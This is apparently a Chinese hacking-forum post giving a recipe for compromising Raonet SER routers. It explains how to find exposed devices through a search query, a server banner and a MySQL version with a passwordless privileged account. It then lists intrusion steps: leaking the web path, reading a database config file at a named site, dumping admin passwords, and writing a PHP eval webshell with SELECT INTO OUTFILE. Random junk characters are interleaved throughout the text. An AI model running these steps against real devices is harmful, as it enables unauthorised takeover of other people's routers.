寻找存在漏洞的路由器方法:. \) N' P0 _+ b) ?5 C5 h/ p
4 T6 J' J7 g" h) n1:google搜索'Raonet Subscriber Ethernet Router'
/ O& x7 K- Q' Y
) q8 Q# q* Z% x% R) Q9 [2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr2001
' N) ~2 {; T+ q5 d% Y& ^& T! m
. X7 c- f7 G+ }1 ^! B. K3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。
6 N7 e- o2 A; T* q/ f4 M3 i! ], I# V9 {9 s+ t+ J( ]/ {. c9 M
//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成......5 p3 \& d) n1 q& \" S" K4 A
3 a5 ~& f' o; g% S
& \0 @% p2 y1 i/ [$ ~
# ?6 F/ U( h+ l, J X
入侵步骤:: \3 z) Q) X% R; M6 L9 K, p H
: |0 G, _ \ {4 M; r1.爆web路径,http://www.yu1u.org/src/jpgraph_line.php4 c1 R8 p( ^5 Y, X5 A* T3 X
+ t/ D. J1 j' m2:查看数据库配置文件,http://www.yu1u.org/inc/conn_db.inc
: a+ c& r8 `: x: z3:得到密码后连接,查看GUI管理密码:
4 S% d. o2 q3 Q$ Y/ buse ser_500- e, d; C' ~. ?- e" P6 n
select id,passwd from user;+ L" \* E. I, n0 u. k) S
4:通过数据库写入webshell,执行命令:
- G1 H% r2 w% Q7 }# L3 U6 T5 quse mysql;9 y* f! B, _; z9 h! A$ {& C
create table ok(cmd TEXT);
% D) N0 I8 f; x: F7 ~insert into ok values("<?php @eval($_POST[cmd])?>");0 y/ Q& O- }" W' N% p! u
select * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";- s% E5 |$ v6 U1 D9 }0 g
drop table ok;' h, k& z1 t# b1 _/ M2 `
' e( O4 s0 M2 _; W, a$ P5:连接后门shell.php " s) Q1 l0 x9 o/ X/ h
% H1 P: ~# R- x6. 搞定!8 n6 _" T) z: B: Z- G7 i
5 [% d2 F! F. q; G
|